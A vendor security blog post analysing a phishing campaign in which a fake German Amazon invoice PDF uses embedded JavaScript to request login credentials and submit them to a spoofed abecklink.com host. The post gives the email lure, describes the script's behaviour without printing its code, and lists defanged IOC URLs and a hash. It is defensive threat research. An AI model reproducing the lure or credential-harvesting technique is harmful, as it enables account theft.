The PDF invoice that phished you

Blog 5 of 5 part series on advanced research into modern phishing attacks

Tomislav Pericin headshot
Tomislav Peričin, Chief Software Architect & Co-Founder at ReversingLabsTomislav Peričin
The PDF invoice that phished you

Phishing attacks are deception attempts that try to trick a person into clicking a link that leads to a credential-stealing page or a malicious application download. Relying on social engineering tactics, they have the potential to grant attackers unauthorized access to infrastructure, services, or information. Delivered through most means of modern communication, these kinds of attacks pose a great threat to any organization. That is why it is crucial to strengthen the defenses and cover all possible phishing target vectors.

One such vector that might be overlooked is credential theft via JavaScript-enabled documents. This attack technique doesn’t rely on malicious links or domain spoofing, but on document scripts that yield the same effect.

ReversingLabs has recently detected a few variants of such phishing attacks in the wild. All of them start with a pretty benign-sounding email such as the following.

Screenshot of a German email in Mozilla Thunderbird from “marketplace-messages@amazon.de” with the subject “Rechnung über Ihre Verkaufsgebühren bei Amazon.de [10/2018]”. The message informs the recipient about an attached tax invoice PDF for October 2018 and includes instructions on verifying a digital signature.

When run through an automated language translation service, the message reads something like this.

Screenshot of the same email in Mozilla Thunderbird as image 1, but in English. The subject and structure are the same, explaining the attached tax invoice and providing steps to verify the digital signature.

Sounds quite convincing. Unvigilant readers might miss the fact that the sender email addresses do not match up (abecklink.com vs amazon.de), and open the attached invoice document - a mistake that could lead to a successful phishing attack. If opened through Adobe Acrobat Reader, that email attachment would present the following input dialog.

Screenshot of a PDF file opened in Adobe Reader showing a JavaScript dialog box requesting Amazon login credentials—email address and password. A red warning at the bottom says “Warning: JavaScript Window”.

The document is asking the reader to log in so they can see the sent tax records. As explained in the email, this screen is to be expected, and typing the credentials into it will show the account summary information. Unusual as it may be, an unvigilant reader might brush it off as a security feature designed to keep their private information safe. But what’s going on behind the scenes?

ReversingLabs A1000 visualizes the document structure and allows analysts to browse its contents organized by object type. The image below shows the ins and outs of the attached PDF.

Screenshot showing the internal structure of a malicious PDF file. It lists items such as fonts, scripts, and content streams, along with their format, number of files, and sizes. The file name is "INVOICE.pdf".

Active script content is located in the folder named scripts. There’s only one of those, and its preview in the A1000 interface shows what happens if the reader provides their credentials.

Screenshot of an “Indicators” panel listing suspicious behaviors of the PDF. It shows that the document launches a URL, submits a form, closes itself, and displays a dialog box—classified under NETWORK, DOCUMENT, and ANOMALY categories.

This short JavaScript code essentially sends the provided credentials in plain text to a remote web server. Even without understanding the JavaScript code from this example, it is still possible to come to the same conclusion, because A1000 succinctly describes it with its indicators. The script’s intent gets automatically translated into a human-readable description, as shown below.

Screenshot showing two suspicious HTTP URLs that mimic Amazon's Seller Central domain but actually point to "abecklink.com". They appear to be phishing links.

These indicators make it clear that the attached document is nothing more than a phish by another name - a document-based phish.

Deception is at the core of most email phishing attacks. It relies on an ever-increasing number of ways the user can be misled into visiting a deceptive link. Because some of those deceptive links are hidden deep within document scripts, ReversingLabs has expanded its Titanium platform with the capability to detect them.

Detection starts with the ability to extract links from binary and textual files. Every extracted link is visualized in the Interesting strings section for the respective file within which it was found. For the script analyzed above, the list of interesting strings shows the following two items.

Screenshot of JavaScript code extracted from the malicious PDF. It defines a fake dialog asking for Amazon credentials and shows code that submits the data to a phishing URL.

Static analysis performed by the Titanium platform isn’t limited to files alone. Collected metadata goes through a post-processing step that converts it to indicators and tags. In turn, tags provide a succinct description of intent, and allow pivoting through large datasets. Based on static link analysis, the following tags would be assigned to the aforementioned script.

  • #indicator-document
  • #indicator-network
  • #script
  • #string-http
  • #uri-domain-spoofed
  • #uri-hostname-length
  • #uri-subdomain-count
  • #web-request

Highlighted are the tags that make this email stand out in the crowd. Paired with the rest of our platform, those tags provide a simple way to navigate a large email dataset. This new feature arms the defenders with insights and pivot points around every link shared with their organization, whether the links come from the email body, or from any of the message attachments. Based on those insights, a stricter set of policies can be created, increasing the overall security of the organization.

IOC:
MIME - 3078674d0a85602c12e70d795c1579f18513fcd1a740c638f49b121b853d07be

URL:
http://sellercentral[.]amazon[.]de[.]56U8GTHDGT4U7YWEWE84GTYS[.]abecklink[.]com/step1.php
http://sellercentral[.]amazon[.]de[.]56U8GTHDGT4U7YWEWE84GTYS[.]abecklink[.]com


Read our prior blog in the series on Catching lateral movement in internal emails.

Promotional banner from ReversingLabs encouraging viewers to “Arm your team against phishing attacks.” The image features a stylized 3D book with a tablet on the cover showing a phishing hook pulling credentials from a laptop screen. A red button at the bottom says, “Get the eBook.”

Back to Top